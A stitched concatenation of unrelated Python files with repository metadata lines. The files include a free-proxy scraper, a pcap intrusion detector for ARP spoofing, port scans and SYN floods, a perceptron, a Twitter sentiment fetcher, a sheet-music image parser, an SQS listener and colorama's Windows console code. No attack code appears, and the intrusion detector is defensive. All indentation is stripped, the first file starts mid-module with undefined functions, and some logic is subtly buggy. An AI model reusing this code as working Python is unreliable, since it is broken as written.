def get_proxy_list_proxy_ru_niming():
url = 'http://proxy.com.ru/niming/list_%d.html'
jobs = []
for i in xrange(1, 7):
try:
resp = requests.get(url%i, timeout=7)
except:
continue
if resp.status_code != 200:
continue
soup = BeautifulSoup(resp.content)
for table in soup('table'):
for tr in table('tr'):
tds = tr('td')
if len(tds) >= 3:
proxy = {
'http': 'http://%s:%s' % (tds[1].getText(), tds[2].getText()),
'https': 'http://%s:%s' % (tds[1].getText(), tds[2].getText()),
}
jobs.append(proxy)
return jobs
def get_proxy_list_itmop():
ip_list = []
jobs = []
for url in xrange(1690, 10000):
try:
url = 'http://www.itmop.com/proxy/post/%s.html' % url
# url = 'http://www.cz88.net/proxy/index_%s.aspx' % url
result = requests.get(url, timeout=10).text
pattern = re.compile(r'(\d+\.\d+\.\d+\.\d+)[: ](\d+)')
ilist = pattern.findall(result)
for ip in ilist:
proxy = {
'http': 'http://%s:%s' % (ip[0], ip[1]),
'https': 'http://%s:%s' % (ip[0], ip[1]),
}
jobs.append(proxy)
except:
raise
break
return jobs
def get_proxy_list():
print 'fetching proxy list from free proxy list site...'
ret = []
jobs = []
proxy_source_methos = [
get_proxy_list_pachong,
get_proxy_list_cnproxy,
get_proxy_list_ipcn,
get_proxy_list_proxy_ru_gaoni,
get_proxy_list_proxy_ru_niming,
#get_proxy_list_itmop,
]
for f in proxy_source_methos:
try:
jobs.append(gevent.spawn(f))
except requests.exceptions.Timeout:
pass
except:
pass
#ret.extend(get_proxy_list_pachong())
#ret.extend(get_proxy_list_cnproxy())
for job in jobs:
ret.extend(job.get())
ret = get_proxy_list_from_gevent(ret)
print 'proxy list fetch finished.'
return ret
def test():
st = time.time()
proxy_list = get_proxy_list()
print time.time() - st
#print proxy_list
print len(proxy_list)
if __name__ == '__main__':
test()
|
atupal/ccrawler
|
request/proxy.py
|
Python
|
mit
| 6,854
|
from coyote_framework.config.abstract_config import ConfigBase
class TimeoutConfig(ConfigBase):
def __init__(self):
super(TimeoutConfig, self).__init__('timeout')
|
Shapeways/coyote_framework
|
coyote_framework/config/timeout_config.py
|
Python
|
mit
| 177
|
import importlib
def get_full_class_path_name(obj):
if hasattr(obj,'__call__'):
obj = obj()
return obj.__module__ + "." + obj.__class__.__name__
def get_orient_valid_class_name(obj):
name = get_full_class_path_name(obj)
return name.replace(".", "___dot___")
def get_module_class_name_from_orient_class_name(orient_class):
pythonized = orient_class.replace("___dot___", ".")
parts = pythonized.split(".")
class_name = parts.pop()
module_name = '.'.join(parts)
return module_name, class_name
def class_for_name(module_name, class_name):
# load the module, will raise ImportError if module cannot be loaded
module = importlib.import_module(module_name)
# get the class, will raise AttributeError if class cannot be found
klass = getattr(module, class_name)
return klass
def get_class_from_orient_class_name(orient_class):
# wraps up other functions into one
module_name, class_name = get_module_class_name_from_orient_class_name(
orient_class)
return class_for_name(module_name, class_name)
|
ejesse/ogorm
|
models/model_utils.py
|
Python
|
mit
| 1,141
|
from django.shortcuts import render
from django.views import View
class LoadTimes(View):
def get(self, request):
from apps.statistics.models import MStatistics
data = {
'feed_loadtimes_1min': MStatistics.get('last_1_min_time_taken'),
'feed_loadtimes_avg_hour': MStatistics.get('latest_avg_time_taken'),
'feeds_loaded_hour': MStatistics.get('latest_sites_loaded'),
}
chart_name = "load_times"
chart_type = "counter"
formatted_data = {}
for k, v in data.items():
formatted_data[k] = f'{chart_name}{{category="{k}"}} {v}'
context = {
"data": formatted_data,
"chart_name": chart_name,
"chart_type": chart_type,
}
return render(request, 'monitor/prometheus_data.html', context, content_type="text/plain")
|
samuelclay/NewsBlur
|
apps/monitor/views/newsblur_loadtimes.py
|
Python
|
mit
| 882
|
#!/usr/bin/env python
import math, optparse, random, sys, time, socket, struct
from collections import deque
import dpkt
# For debugging
import pdb
class IDS(object):
MAC_ADDRESSES = {
'\xC0\xA8\x00\x64': '\x7C\xD1\xC3\x94\x9E\xB8', # 192.168.0.100
'\xC0\xA8\x00\x67': '\xD8\x96\x95\x01\xA5\xC9', # 192.168.0.103
'\xC0\xA8\x00\x01': '\xF8\x1A\x67\xCD\x57\x6E', # 192.168.0.1
}
port_scan = {}
syn_flood = {}
def __init__(self):
usage = '%prog <pcap>'
self.op = optparse.OptionParser(usage=usage)
def _format_hw(self, addr):
return ':'.join(x.encode('hex') for x in addr)
def _format_ip(self, addr):
return socket.inet_ntoa(addr)
def _format_nums(self, pkts):
return '[%s]' % ','.join(str(pkt['num']) for pkt in pkts)
def test_arp_spoof(self, arp, num):
if arp.spa in self.MAC_ADDRESSES and arp.sha != self.MAC_ADDRESSES[arp.spa]:
print 'Warning: Arp spoofing detected with invalid address %s for packet number %d' % (self._format_hw(arp.sha), num)
def test_port_scan_tcp(self, tcp, ip, num):
if tcp.flags == dpkt.tcp.TH_SYN:
self.test_port_scan(tcp.dport, ip, num)
def test_port_scan_udp(self, udp, ip, num):
self.test_port_scan(udp.dport, ip, num)
def test_port_scan(self, port, ip, num):
if ip.dst in self.port_scan:
pkts = self.port_scan[ip.dst]
for pkt in pkts:
if port == pkt['port']:
return
pkts.append({'src': ip.src, 'dst': ip.dst, 'num': num, 'port': port})
else:
self.port_scan[ip.dst] = [{'src': ip.src, 'dst': ip.dst, 'num': num, 'port': port}]
def finish_test_port_scan(self):
for dst in self.port_scan:
pkts = self.port_scan[dst]
if len(pkts) > 100:
print 'Warning: Port scan detected from source address %s and victim address %s for packet numbers %s' % (self._format_ip(pkts[0]['src']), self._format_ip(pkts[0]['dst']), self._format_nums(pkts))
def test_syn_flood(self, tcp, ip, ts, num):
if tcp.flags == dpkt.tcp.TH_SYN:
dst = ip.dst+':'+str(tcp.dport)
if dst in self.syn_flood:
pkts = self.syn_flood[dst]
while len(pkts) > 0:
pkt = pkts[0]
if ts - pkt['ts'] >= 1:
pkts.popleft()
else:
break
pkts.append({'src': ip.src, 'dst': ip.dst, 'num': num, 'port': tcp.dport, 'ts': ts})
if len(pkts) > 100:
print 'Warning: Syn flood detected from source address %s and victim address %s for packet numbers %s' % (self._format_ip(pkts[0]['src']), self._format_ip(pkts[0]['dst']), self._format_nums(pkts))
pkts.clear()
else:
self.syn_flood[dst] = deque([{'src': ip.src, 'dst': ip.dst, 'num': num, 'port': tcp.dport, 'ts': ts}])
def main(self, argv=None):
if not argv:
argv = sys.argv[1:]
opts, args = self.op.parse_args(argv)
if not args:
self.op.error('missing pcap file')
elif len(args) > 1:
self.op.error('only one pcap file may be specified')
f = open(args[0])
pcap = dpkt.pcap.Reader(f)
for idx, (ts, buf) in enumerate(pcap):
num = idx + 1
eth = dpkt.ethernet.Ethernet(buf)
level3 = eth.data
if type(level3) is dpkt.arp.ARP:
self.test_arp_spoof(level3, num)
elif type(level3) is dpkt.ip.IP:
level4 = level3.data
if type(level4) is dpkt.tcp.TCP:
self.test_port_scan_tcp(level4, level3, num)
self.test_syn_flood(level4, level3, ts, num)
elif type(level4) is dpkt.udp.UDP:
self.test_port_scan_udp(level4, level3, num)
self.finish_test_port_scan()
f.close()
if __name__ == '__main__':
p = IDS()
p.main()
|
somethingnew2-0/CS642-HW2
|
main.py
|
Python
|
mit
| 4,175
|
import csv
import math
def get_samples(path='./ld2/examples.txt'):
# read attributes
with open(path) as f:
# `\d\\t\d\\n` format
example = [(int(a[0]), int(a[1]))
for a in csv.reader(f, delimiter='\t')]
return example
def get_results(path='./ld2/d.txt'):
with open(path) as f:
results = [int(a[0])
for a in csv.reader(f, delimiter='\t')]
return results
class Perceptron():
"""
n – neironu skaits
m – svaru skaits neironos, arī ieeju skaits
x(m) – viens apmācības paraugs – skaitļu virkne
W(n,m) – svaru matrica
b(n) – papildus svaru matrica
g – slīpuma koeficients
y(n) – iegūtais rezultāts – skaitļu virkne
e(n) - paraugu kļūda
nn - apmācības koef
"""
def __init__(self, n, m, W, b, g, nn):
self.n = n
self.m = m
self.w = W
self.b = b
self.g = g
self.nn = nn
self.grad = [0] * n
self.y = []
def run_slp_single(self, x):
y = []
for i in range(self.n):
net = self.b[i]
for k in range(self.m):
net += x[k] * self.w[i][k]
# lineārās aktivitātes funkcija
y.append(1 / (1 + math.exp(-net / self.g)))
# y.append(1 if net > 0.5 else 0)
return y
def run_mlp_single(self, x):
for i in range(self.n):
net = self.b[i]
for k in range(self.m):
net += x[k] * self.w[i][k]
# lineārās aktivitātes funkcija
self.y.append(1 / (1 + math.exp(-net / self.g)))
# y.append(1 if net > 0.5 else 0)
return self.y
def train_slp_single(self, x, d):
e = []
y = self.run_slp_single(x)
for i in range(self.n):
e.append(d - y[i])
self.grad[i] = e[i] / self.g * y[i] * (1 - y[i])
for k in range(self.m):
self.w[i][k] += self.nn * x[k] * self.grad[i]
self.b[i] += self.nn * self.grad[i]
return e
def train_slp(self, x, d, maxepoch=500):
p = len(x)
ee = 0.01
err = 100000
epoch = 0
while epoch < maxepoch and err > ee:
epoch += 1
err = 0
for k in range(p):
e = self.train_slp_single(x[k], d[k])
for j in range(self.n):
err += math.pow(e[j], 2)
err /= p * self.n
return self.w, self.b, epoch
def main():
samples = get_samples()
results = get_results()
print(samples)
print(results)
preceptron = Perceptron(
n=1,
m=2,
W=[[-0.3, -0.3], [-0.3, -0.3]],
b=[1],
g=0.2,
nn=0.1
)
print(
[preceptron.run_slp_single(samples[i]) for i in range(4)]
)
print(
[preceptron.train_slp_single(samples[i], results[i]) for i in range(4)]
)
print(preceptron.train_slp(samples, results))
if __name__ == "__main__":
main()
|
ktaube/neural-network-course
|
neural-netoworks/ld2.py
|
Python
|
mit
| 3,074
|
from random import random, seed
from ast import literal_eval
from movement import bot_map, direction
crash_flag = 0
seed()
values = {'weight': random(), 'threshold': 0, 'alpha': 15}
def init(): # first time write to file
global values
dump = open('dump.txt', 'w')
dump.write(str(values))
dump.close()
def learn(distance):
global direction, values
print values
# dump = open('dump.txt', 'r')
# # read file
# values = literal_eval(dump.read())
# dump.close()
weight = values['weight']
threshold = values['threshold']
product = distance * weight
if product < threshold:
print "Crash predicted. Commencing pre-emptive rerouting."
direction = (0, 0)
bot_map(direction)
return 1
else:
return 0
|
braininahat/sonny
|
perceptron.py
|
Python
|
mit
| 796
|
import os
__all__ = [
'is_updated',
]
def is_updated(old_file, new_file):
return not os.path.exists(new_file) or \
os.stat(old_file).st_mtime > os.stat(new_file).st_mtime
|
axiak/jinja-static
|
jinjastatic/utils.py
|
Python
|
mit
| 189
|
from setuptools import setup, find_packages
import os
CLASSIFIERS = [
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
]
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
# Dynamically calculate the version based on django.VERSION.
version = __import__('django_ajax').get_version()
setup(
author='Yonel Ceruto Glez',
author_email='yonelceruto@gmail.com',
name='djangoajax',
version=version,
description='Powerful and easy AJAX framework for django applications.',
long_description=README,
url='https://github.com/yceruto/django-ajax',
license='MIT License',
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
install_requires=[
'setuptools',
'django>=1.3',
],
packages=find_packages(),
include_package_data=True,
zip_safe=False
)
|
furious-luke/django-ajax
|
setup.py
|
Python
|
mit
| 1,325
|
import models
import urllib
import urllib2
import simplejson as json
import re
from porterstemmer import Stemmer
from datetime import datetime
from itertools import count
stemmer = Stemmer()
PLUS_LIST = [
'cool',
'awesome',
'like',
'good',
'love',
'great',
'enjoy',
'amazing',
'good'
]
MINUS_LIST = [
'dislike',
'hate',
'sucks',
'not like',
'don\'t like',
'bad'
]
CHECK_WORD = re.compile(r'^([\w\d\-_]+?)[\.\?\!,\-]?( |$)')
PLUS_LIST = map(stemmer, PLUS_LIST)
MINUS_LIST = map(stemmer, MINUS_LIST)
plus_expr = '(%s)' % '|'.join(PLUS_LIST)
minus_expr = '(%s)' % '|'.join(MINUS_LIST)
PLUS_EXPR = re.compile(plus_expr)
MINUS_EXPR = re.compile(minus_expr)
class TwitterFetcher(object):
def __init__(self, query_string, since_id=1, fetch_lib=urllib2):
self.query_string = query_string
self.since_id = since_id
self.fetch_lib = fetch_lib
def fetch(self):
str = urllib.urlencode({
u'q': self.query_string.encode('utf-8'),
u'since_id': self.since_id
})
result = self.fetch_lib.urlopen(
u'http://search.twitter.com/search.json?%s' % str
).read()
return json.loads(result)
class TwitterUserFetcher(object):
def __init__(self, user, since_id=1, fetch_lib=urllib2):
self.user = user
self.since_id = since_id
self.fetch_lib = fetch_lib
def fetch(self):
str = urllib.urlencode({
'screen_name': self.user,
'since_id': self.since_id,
'count': 1000
})
url = 'http://twitter.com/statuses/user_timeline.json?%s' % str
result = self.fetch_lib.urlopen(url).read()
return json.loads(result)
def find_or_create_user(name):
return models.User.objects.get_or_create(
name=name,
network='twitter',
url="http://twitter.com/%s" % name
)[0]
def get_score(msg):
if MINUS_EXPR.search(msg):
return -1
if PLUS_EXPR.search(msg):
return 1
#if any(map(lambda a: a in msg, MINUS_LIST)):
# return -1
#if any(map(lambda a: a in msg, PLUS_LIST)):
# return 1
#for minus in MINUS_LIST:
# if minus in msg:
# return -1
#for plus in PLUS_LIST:
# if plus in msg:
# return 1
return 0
def update_trackable(trackable, id, score):
trackable.last_id = id if id > trackable.last_id else trackable.last_id
trackable.score += score
trackable.save()
def create_data(trackable, results):
stemmer = Stemmer()
name = stemmer(trackable.name)
for result in results:
txt = stemmer(result['text'])
if not contains_movie(txt, name):
continue
user = find_or_create_user(result['from_user'])
score = get_score(stemmer(result['text'].lower()))
user.review(trackable, score)
update_trackable(trackable, result['id'], score)
def fetch_trackable(trackable, fetch_class=TwitterFetcher):
f = fetch_class(trackable.name, since_id=trackable.last_id)
return f.fetch()
def fetch_data(fetch_class=TwitterFetcher):
for t in models.Trackable.objects.all():
result = fetch_trackable(t, fetch_class=fetch_class)
create_data(t, result['results'])
def fetch_user(user, fetch_class=TwitterUserFetcher):
f = fetch_class(user.name, since_id=user.last_id)
try:
return f.fetch()
except Exception, e:
print e
return []
def contains_movie(text, movie_name):
names_list = movie_name.split(' ')
for name in names_list:
if name not in text: return False
positions = map(text.find, names_list)
sub_strings = map(lambda i: text[i:], positions)
if any(map(
lambda i: i != 0 and
re.match(r'[\w]', text[i - 1]) is not None, positions
)): return False
# more sophisticated tests
contains_full_words = map(lambda a: CHECK_WORD.match(a), sub_strings)
if any(map(lambda i: i is None, contains_full_words)): return False
sub_matches = map(lambda a: a.groups()[0], contains_full_words)
if any(map(lambda a: a not in names_list, sub_matches)): return False
return True
def find_trackable(trackables, text):
stemmer = Stemmer()
for trackable in trackables:
if contains_movie(text, stemmer(trackable.name)):
return trackable
return None
def create_user_data(user, trackables, results):
stemmer = Stemmer()
for result in results:
msg = stemmer(result['text'])
trackable = find_trackable(trackables, msg)
score = get_score(msg)
if result['id'] > user.last_id: user.last_id = result['id']
if not trackable: continue
update_trackable(trackable, 0, score)
user.review(trackable, score)
user.save()
def fetch_user_data(fetch_class=TwitterFetcher):
trackables = models.Trackable.objects.all()
for user in models.User.objects.all():
results = fetch_user(user, fetch_class=fetch_class)
create_user_data(user, trackables, results)
|
mop/twit-miner
|
twit_miner/crits/twitlib.py
|
Python
|
mit
| 5,119
|
from api.parsers.constants.en import GENDER, CASES, NUMBER, MOOD, TENSE, PERSONS, VOICE, DEFINITENESS, POSSESSIVENESS
def render_non_lemma(non_lemma_type):
def wrapper(non_lemma) -> str:
explanation = non_lemma_type
ret = explanation + ' of [[%s]]' % (non_lemma.lemma)
return ret
return wrapper
render_romanization = render_non_lemma('romanization')
render_alternative_spelling = render_non_lemma('alternative spelling')
def render_noun_form(non_lemma) -> str:
"""
:return: A malagasy language definition in unicode
"""
explanation = ''
if non_lemma.possessive in POSSESSIVENESS:
explanation += POSSESSIVENESS[non_lemma.possessive] + ' '
if non_lemma.case in CASES:
explanation += CASES[non_lemma.case] + ' '
if non_lemma.gender in GENDER:
explanation += GENDER[non_lemma.gender] + ' '
if non_lemma.number in NUMBER:
explanation += NUMBER[non_lemma.number] + ' '
if non_lemma.definite in DEFINITENESS:
explanation += DEFINITENESS[non_lemma.definite] + ' '
ret = explanation + 'of [[%s]]' % (non_lemma.lemma)
return ret
def render_verb_form(non_lemma) -> str:
"""
:return: A malagasy language definition in unicode
"""
explanation = ''
if non_lemma.person in PERSONS:
explanation += PERSONS[non_lemma.person] + ' '
if non_lemma.number in NUMBER:
explanation += NUMBER[non_lemma.number] + ' '
explanation += 'of the ' if len(explanation.strip()) != 0 else ''
if non_lemma.mood in MOOD:
explanation += MOOD[non_lemma.mood] + ' '
if non_lemma.tense in TENSE:
explanation += TENSE[non_lemma.tense] + ' '
explanation += 'of the ' if len(explanation.strip()) != 0 else ''
if non_lemma.voice in VOICE:
explanation += VOICE[non_lemma.voice] + ' '
ret = explanation + 'of [[%s]]' % (non_lemma.lemma)
return ret
|
radomd92/botjagwar
|
api/parsers/renderers/en.py
|
Python
|
mit
| 1,923
|
from __future__ import division
import collections
import importlib
from datetime import datetime
from time import mktime
DATE_SUFFIX = collections.OrderedDict([
(31557600, "year"),
(2592000, "month"),
(604800, "week"),
(86400, "day"),
(3600, "hour"),
(60, "minute"),
(0, "second")
])
def difference(tfrom, tto):
if type(tfrom) == datetime:
tfrom = mktime(tfrom.timetuple())
if type(tto) == datetime:
tto = mktime(tto.timetuple())
tfrom, tto = int(tfrom), int(tto)
distance = tto - tfrom
if distance == 0:
return "just now"
present = "from now" if distance > 0 else "ago"
distance = abs(distance)
for key, val in DATE_SUFFIX.items():
if key <= distance:
distance = int(distance / key) if key > 0 else distance
return "{} {}{} {}".format(distance, val, "" if distance == 1 else "s", present)
def preciseDifference(tfrom, tto):
if type(tfrom) == datetime:
tfrom = mktime(tfrom.timetuple())
if type(tto) == datetime:
tto = mktime(tto.timetuple())
tfrom, tto = int(tfrom), int(tto)
distance = tto - tfrom
if distance == 0:
return "just now"
present = "from now" if distance > 0 else "ago"
distance = abs(distance)
values = []
for key, val in DATE_SUFFIX.items():
if key <= distance:
value = int(distance / key) if key > 0 else distance
distance -= value * (key if key > 0 else 1)
values.append("{} {}{}".format(value, val, "" if value == 1 else "s"))
if distance <= 0:
break
return ", ".join(values) + " " + present
|
clugg/humanizepy
|
humanizepy/_datetime.py
|
Python
|
mit
| 1,676
|
"""urlconf for the base application"""
from django.conf.urls import url, patterns
from . import views
urlpatterns = patterns('base.views',
url(r'^$', 'home', name='home'),
url(r'^grow/monitor/$', 'monitor', name='monitor'),
url(r'^grow/about/$', 'about', name='about'),
url(r'^grow/control/$', 'control', name='control'),
)
|
jpk0727/growApp
|
apps/base/urls.py
|
Python
|
mit
| 344
|
from PIL import Image
import math
import numpy as np
class SheetImage:
def __init__(self, source_image_path):
# initializes image metadata from analyzing image
self.image = Image.open(source_image_path)
self.image_array = np.asarray(self.image)
# static methods used for image analysis on both the main image
# as well as its constituents
@staticmethod
def get_width(image):
# returns the width of the provided image
return SheetImage.get_dimensions(image)[0]
@staticmethod
def get_height(image):
# returns the width of the provided image
return SheetImage.get_dimensions(image)[1]
@staticmethod
def get_midpoint(image):
# returns x-midpoint of the provided image
return int(math.ceil(SheetImage.get_width(image)/2))
@staticmethod
def get_dimensions(image):
# returns tuple of (width, height) of the provided image
image_array_shape = np.asarray(image).shape
return image_array_shape[1], image_array_shape[0]
@staticmethod
def pixel_is_black(image, x, y, threshold=20):
# returns true if the given pixel is "within threshold values" to black
pixel_value = SheetImage.get_pixel_value(image, x, y)
return pixel_value < threshold
@staticmethod
def get_pixel_value(image, x, y):
return np.asarray(image)[y][x]
@staticmethod
def get_row(image, row_number):
return np.asarray(image)[row_number]
@staticmethod
def get_column(image, row_number):
column = []
image_height = SheetImage.get_height(image)
for y in range(image_height):
column.append(np.asarray(image)[y][row_number])
return column
def get_notes(self):
# returns a list of note images from sheet music image
print("Attempting to parse notes.")
staff_images = self.__get_staff_images()
notes = []
for staff in staff_images:
print("Analyzing a staff.")
width = SheetImage.get_width(staff)
height = SheetImage.get_height(staff)
# get the number of black pixels for a staff with no notes
# to get this, we'll scan the staff and take the least amount of black pixels found
least_found = None
for x in range(0, width):
number_found = 0
for y in range(0, height):
if SheetImage.pixel_is_black(staff, x, y):
number_found += 1
if number_found < least_found or least_found is None:
least_found = number_found
empty_staff_black_pixel_count = least_found
# now that we have the amount of black pixels expected in a column where there is no
# note, we can begin to slice out the actual notes
scanning_note = False
note_begin = None
note_end = None
for x in range(0, width):
number_found = 0
for y in range(0, height):
if SheetImage.pixel_is_black(staff, x, y):
number_found += 1
if empty_staff_black_pixel_count == number_found: # we're still looking for a note
if scanning_note:
# we found the end of the note
note_end = x-1
scanning_note = False
# as a rough way to check that it is, in fact, a note, check that it's width > 3px
if (note_end - note_begin > 3):
# add some image padding
note_begin -= 2
note_end += 2
note = staff.crop((note_begin, 0, note_end, height-1))
notes.append(note)
print("Found a note.")
else:
pass # we're probably looking at a divider
else:
# just keep looking
pass
else:
if scanning_note:
# we already know we're looking at a note, find the end
pass
else:
# found the end of the note
scanning_note = True
note_begin = x
return notes
def __get_staff_images(self):
# returns images of the staffs
staff_positions = self.__get_staffs_positions()
staff_images = []
for i, p in enumerate(staff_positions):
x1 = p[0]
y1 = p[1]
x2 = p[0]+p[2]
y2 = p[1]+p[3]
image = self.image.crop((x1, y1, x2, y2))
staff_images.append(image)
return staff_images
def __get_staffs_positions(self):
# returns 4-tuples of staff dimensions
# takes a staff_ys_list from get_staff_ys()
# get the first staff y-values
staff_ys_list = self.__get_all_staffs_ys()
first_staff = staff_ys_list[0]
first_staffs_ys = range(first_staff[0], first_staff[1])
staff_x_beginning = 0
staff_x_end = SheetImage.get_width(self.image)
# starting from the middle of the page, go left until black pixels aren't found
for x in reversed(range(0, SheetImage.get_midpoint(self.image))):
found_black = False
for y in first_staffs_ys:
current_pixel = SheetImage.pixel_is_black(self.image, x, y, 20)
found_black = found_black or current_pixel
if not found_black:
staff_x_beginning = x+3
break
# starting from the middle of the page, go right until black pixels aren't found
for x in range(SheetImage.get_midpoint(self.image), SheetImage.get_width(self.image)):
found_black = False
for y in first_staffs_ys:
current_pixel = SheetImage.pixel_is_black(self.image, x, y, 20)
found_black = found_black or current_pixel
if not found_black:
staff_x_end = x-2
break
staff_positions_without_padding = []
# compile list of x, y, width, height of staffs
for staff_ys in staff_ys_list:
x = staff_x_beginning
width = staff_x_end - staff_x_beginning
y = staff_ys[0]
height = staff_ys[1] - staff_ys[0]
dimensions = (x, y, width, height)
staff_positions_without_padding.append(dimensions)
# add paddings to support off-staff notes
final_staff_positions = []
# determine padding as half of distance between staff 1 and 2
for staff_position in staff_positions_without_padding:
height = staff_position[3]
padding = int(height / 2)
width = staff_position[2]
height += padding * 2
x = staff_position[0]
y = staff_position[1] - padding
final_staff_positions.append((x, y, width, height))
return final_staff_positions
def __get_all_staffs_ys(self):
# returns list of staff y positions tuples: [(beg, end)]
staffs_ys_list = []
found_staff = True
while (found_staff):
current_staff_ys = self.__get_first_staff_ys(staffs_ys_list[-1][1] if len(staffs_ys_list) > 0 else 0)
if (current_staff_ys == None):
found_staff = False
else:
staffs_ys_list.append(current_staff_ys)
return staffs_ys_list
def __get_first_staff_ys(self, vertical_offset):
# returns a tuple of the beginning and end y positions of the first staff
# found below the provided vertical_offset
midpoint = SheetImage.get_midpoint(self.image)
image_height = SheetImage.get_height(self.image)
staff_spacing_variance = 5
for y_root in range(vertical_offset+1, image_height-25):
current_pixel_is_black = SheetImage.pixel_is_black(self.image, midpoint, y_root, 20)
if not current_pixel_is_black:
continue # haven't found the first ledger line yet
# now we've possibly found the first ledger line
next_pixel_is_black = SheetImage.pixel_is_black(self.image, midpoint, y_root+1, 20)
if next_pixel_is_black:
continue # we're assuming for now all lines are 1px thick
# now we'll find the spacing between this ledger and the next one
ledger_spacing = 0
for y_spacing in range(y_root+1, image_height):
spacing_pixel_is_black = SheetImage.pixel_is_black(self.image, midpoint+1, y_spacing, 20)
if (spacing_pixel_is_black):
break # we found another ledger line
else:
ledger_spacing += 1 # we found another row of spacing
# now we must verify that the spacing can predict the next ledger lines
# firstly, verify that the expected ledger lines are black
num_non_black = 0
# make sure it's possible to fit a staff below
if (y_root + ledger_spacing * 4) > SheetImage.get_height(self.image):
continue # continue
# now we check if we're probably looking at a ledger line
# we'll make sure there's 5 ledger lines within the amount
# of space we analyze (ledger_spacing*5+5) (5 for threshold)
num_black = 0
num_pixels = ledger_spacing*(5)+staff_spacing_variance
for y_ledger in range(num_pixels):
pixel_value_is_black = SheetImage.pixel_is_black(self.image, midpoint, y_root+y_ledger, 20)
num_black += pixel_value_is_black
if (num_black != 5):
continue # we found too many black pixels
# for now, we'll assume this is good enough to prove we found a staff
return (y_root-staff_spacing_variance, y_root+ledger_spacing*5+staff_spacing_variance)
return None # we couldn't find any staff
if __name__=="__main__":
s = SheetImage("../../bin/mary-had-a-little-lamb.gif")
notes = s.get_notes()
for i, note in enumerate(notes):
note.save(str(i)+".gif")
|
sfmckenrick/sight-parse
|
src/imaging/sheet_image.py
|
Python
|
mit
| 10,494
|
import json
import logging
import traceback
import urllib
from dart.context.locator import injectable
from dart.message.call import SubscriptionCall
from dart.model.subscription import SubscriptionState
_logger = logging.getLogger(__name__)
@injectable
class SubscriptionListener(object):
def __init__(self, subscription_broker, subscription_service, subscription_element_service, trigger_service,
subscription_batch_trigger_processor, emailer):
self._subscription_broker = subscription_broker
self._subscription_service = subscription_service
self._subscription_element_service = subscription_element_service
self._trigger_service = trigger_service
self._subscription_batch_trigger_processor = subscription_batch_trigger_processor
self._emailer = emailer
self._handlers = {
SubscriptionCall.GENERATE: self._handle_create_subscription_call
}
def await_call(self, wait_time_seconds=20):
self._subscription_broker.receive_message(self._handle_call, wait_time_seconds)
def _handle_call(self, message_id, message, previous_handler_failed):
if 'Subject' in message and message['Subject'] == 'Amazon S3 Notification':
handler = self._handle_s3_event
else:
call = message['call']
if call not in self._handlers:
raise Exception('no handler defined for call: %s' % call)
handler = self._handlers[call]
try:
handler(message_id, message, previous_handler_failed)
except Exception:
_logger.error(json.dumps(traceback.format_exc()))
# message_id and previous_handler_failed are unused because the conditional insert makes this funciton idempotent
# noinspection PyUnusedLocal
def _handle_s3_event(self, message_id, message, previous_handler_failed):
""" :type message: dict """
# Helpful data to help understand this function:
#
# - http://docs.aws.amazon.com/AmazonS3/latest/dev/notification-content-structure.html
# - dart/tools/sample-s3event_sqs-message.json
#
for record in json.loads(message['Message'])['Records']:
if not record['eventName'].startswith('ObjectCreated:'):
continue
s3_path = 's3://' + record['s3']['bucket']['name'] + '/' + urllib.unquote(record['s3']['object']['key'])
size = record['s3']['object']['size']
for subscription in self._subscription_service.find_matching_subscriptions(s3_path):
if not subscription.data.nudge_id:
success = self._subscription_element_service.conditional_insert_subscription_element(
subscription, s3_path, size
)
if success:
self._trigger_service.evaluate_subscription_triggers(subscription)
def _handle_create_subscription_call(self, message_id, message, previous_handler_failed):
subscription = self._subscription_service.get_subscription(message['subscription_id'])
subscription = self._subscription_service.update_subscription_message_id(subscription, message_id)
if previous_handler_failed:
self._subscription_service.update_subscription_state(subscription, SubscriptionState.FAILED)
self._emailer.send_subscription_failed_email(subscription)
return
self._subscription_element_service.generate_subscription_elements(subscription)
self._trigger_service.evaluate_subscription_triggers(subscription)
self._emailer.send_subscription_completed_email(subscription)
|
RetailMeNotSandbox/dart
|
src/python/dart/message/subscription_listener.py
|
Python
|
mit
| 3,702
|
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from . import win32
# from wincon.h
class WinColor(object):
BLACK = 0
BLUE = 1
GREEN = 2
CYAN = 3
RED = 4
MAGENTA = 5
YELLOW = 6
GREY = 7
# from wincon.h
class WinStyle(object):
NORMAL = 0x00 # dim text, dim background
BRIGHT = 0x08 # bright text, dim background
BRIGHT_BACKGROUND = 0x80 # dim text, bright background
class WinTerm(object):
def __init__(self):
self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes
self.set_attrs(self._default)
self._default_fore = self._fore
self._default_back = self._back
self._default_style = self._style
# In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.
# So that LIGHT_EX colors and BRIGHT style do not clobber each other,
# we track them separately, since LIGHT_EX is overwritten by Fore/Back
# and BRIGHT is overwritten by Style codes.
self._light = 0
def get_attrs(self):
return self._fore + self._back * 16 + (self._style | self._light)
def set_attrs(self, value):
self._fore = value & 7
self._back = (value >> 4) & 7
self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND)
def reset_all(self, on_stderr=None):
self.set_attrs(self._default)
self.set_console(attrs=self._default)
self._light = 0
def fore(self, fore=None, light=False, on_stderr=False):
if fore is None:
fore = self._default_fore
self._fore = fore
# Emulate LIGHT_EX with BRIGHT Style
if light:
self._light |= WinStyle.BRIGHT
else:
self._light &= ~WinStyle.BRIGHT
self.set_console(on_stderr=on_stderr)
def back(self, back=None, light=False, on_stderr=False):
if back is None:
back = self._default_back
self._back = back
# Emulate LIGHT_EX with BRIGHT_BACKGROUND Style
if light:
self._light |= WinStyle.BRIGHT_BACKGROUND
else:
self._light &= ~WinStyle.BRIGHT_BACKGROUND
self.set_console(on_stderr=on_stderr)
def style(self, style=None, on_stderr=False):
if style is None:
style = self._default_style
self._style = style
self.set_console(on_stderr=on_stderr)
def set_console(self, attrs=None, on_stderr=False):
if attrs is None:
attrs = self.get_attrs()
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
win32.SetConsoleTextAttribute(handle, attrs)
